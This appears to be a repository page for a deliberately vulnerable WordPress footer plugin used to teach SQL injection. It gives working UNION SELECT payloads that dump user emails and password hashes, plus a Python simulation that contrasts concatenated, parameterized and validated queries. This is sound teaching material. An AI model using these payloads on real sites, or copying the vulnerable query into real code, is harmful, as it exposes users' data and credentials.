A WordPress plugin that is vulnerable to SQL injection.
PHP
Files
LICENSE
README.md
sql-vuln-wordpress-footer-plugin.php


SQL Vulnerable Footer

WARNING: This plugin should NEVER be run in a production environment. It should only be run on a local development site.

This plugin exposes an SQL Injection Vulnerability.

Functionality

When ?id={user_id} is added to a URL, the display_name of the user with that ID is printed in the page footer.

Examples

On my local site, adding ?id=1 displays

User 1 Display Name is Sal Ferrarello

in the footer.

How to Exploit the SQL Vulnerability

The id value is placed into the SQL query without escaping or validation, so appending a UNION SELECT to it adds attacker-chosen rows to the result and lets you read other information, e.g.

Get Email Addresses

?id=1 UNION SELECT user_email as display_name from is_users LIMIT 100 OFFSET 1

The table name depends on the site's table prefix ($table_prefix in wp-config.php): is_users is the name on the author's site, and with the default prefix it is wp_users. The LIMIT/OFFSET applies to the combined UNION result, so OFFSET 1 skips the legitimate display_name row for user 1 and the footer shows the first e-mail address instead.

You can increment the final number to see other email addresses, e.g.

?id=1 UNION SELECT user_email as display_name from is_users LIMIT 100 OFFSET 2

Other Database Columns

By replacing user_email with another column of the WordPress users table (e.g. user_pass), you can view the contents of that column. Note that user_pass holds password hashes rather than plaintext passwords, but a dumped hash can still be cracked offline, so this is a full account-compromise path.

More Secure Implementations

This plugin includes three functions that get a user's display name:

  • bad_get_display_name() default, has an SQL Injection Vulnerability
  • better_get_display_name() SQL Injection Vulnerability eliminated
  • best_get_display_name() uses native WordPress functions instead of querying the database directly, thereby eliminating the vulnerability
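To make the exploit mechanics and the difference between the three approaches concrete, here is an added, stand-alone simulation. It is not the plugin's code and does not use WordPress or MySQL: it builds an in-memory SQLite table shaped like wp_users from constructed sample rows (the hashes are placeholders), implements a string-concatenating lookup next to a parameterized one and a validate-then-look-up one, and replays the README's OFFSET walk to dump a whole column. The WordPress counterparts of the two safe variants are $wpdb->prepare() with a %d placeholder and absint() followed by get_user_by('id', ...); whether the plugin's better_get_display_name()/best_get_display_name() are implemented exactly that way is not stated on this page. The payload uses UNION ALL rather than the README's UNION only so that SQLite returns rows in a deterministic order.

```python
"""Added example (not the plugin's code): simulate the footer lookup and the
README's UNION/OFFSET dump against an in-memory SQLite table shaped like
WordPress's wp_users. All rows below are constructed sample data."""
import sqlite3

# Constructed users; the user_pass values are placeholders, not real hashes.
SAMPLE_USERS = [
    (1, "salcode", "$P$Bfakehash1", "sal@example.com", "Sal Ferrarello"),
    (2, "editor", "$P$Bfakehash2", "editor@example.com", "Site Editor"),
    (3, "author", "$P$Bfakehash3", "author@example.com", "Guest Author"),
]


def make_db():
    """Create the sample wp_users table (a subset of the real columns)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE wp_users ("
        "ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT, "
        "user_email TEXT, display_name TEXT)"
    )
    conn.executemany("INSERT INTO wp_users VALUES (?, ?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def bad_get_display_name(conn, raw_id):
    """Vulnerable: the raw ?id= value becomes part of the SQL text, so
    anything after the number is executed as SQL."""
    sql = f"SELECT display_name FROM wp_users WHERE ID = {raw_id}"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def better_get_display_name(conn, raw_id):
    """Fixed: the value is bound as a query parameter and can only ever be
    compared against ID, never parsed as SQL (WordPress equivalent:
    $wpdb->prepare() with a %d placeholder)."""
    row = conn.execute(
        "SELECT display_name FROM wp_users WHERE ID = ?", (raw_id,)
    ).fetchone()
    return row[0] if row else None


def best_get_display_name(conn, raw_id):
    """Validate first, then look up through code that never builds SQL from
    the input (WordPress equivalent: absint() then get_user_by('id', ...))."""
    try:
        user_id = int(raw_id)
    except (TypeError, ValueError):
        return None
    return better_get_display_name(conn, user_id)


def union_payload(column, offset):
    """The README's payload for one OFFSET value. UNION ALL is used instead
    of UNION so SQLite returns rows in scan order (left query first, then the
    dumped column) rather than de-duplicated, sorted order; the offset
    arithmetic is unchanged: OFFSET 1 skips the legitimate display_name row."""
    return (f"1 UNION ALL SELECT {column} AS display_name FROM wp_users "
            f"LIMIT 100 OFFSET {offset}")


def dump_column(conn, get_name, column, max_rows=50):
    """Walk OFFSET 1, 2, 3, ... as the README describes, collecting one value
    of `column` per request until the footer shows nothing."""
    values = []
    for offset in range(1, max_rows + 1):
        value = get_name(conn, union_payload(column, offset))
        if value is None:
            break
        values.append(value)
    return values


def run_demo():
    """Return the outcomes of the three lookups against the same database."""
    conn = make_db()
    return {
        "legit_bad": bad_get_display_name(conn, "1"),
        "legit_better": better_get_display_name(conn, 1),
        "legit_best": best_get_display_name(conn, "1"),
        "emails_via_bad": dump_column(conn, bad_get_display_name, "user_email"),
        "hashes_via_bad": dump_column(conn, bad_get_display_name, "user_pass"),
        "emails_via_better": dump_column(conn, better_get_display_name, "user_email"),
        "emails_via_best": dump_column(conn, best_get_display_name, "user_email"),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

Running it shows the concatenating lookup handing back every e-mail address and every user_pass value one OFFSET at a time, while the parameterized lookups return nothing for the same payloads because the whole string is compared against ID as data. One engine-specific caveat: SQLite rejects the non-numeric bound string outright, whereas MySQL would coerce "1 UNION ..." to 1 and return user 1's display name; either way the injected SQL is never executed.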

Additional Reading

Contributors

Sal Ferrarello / @salcode
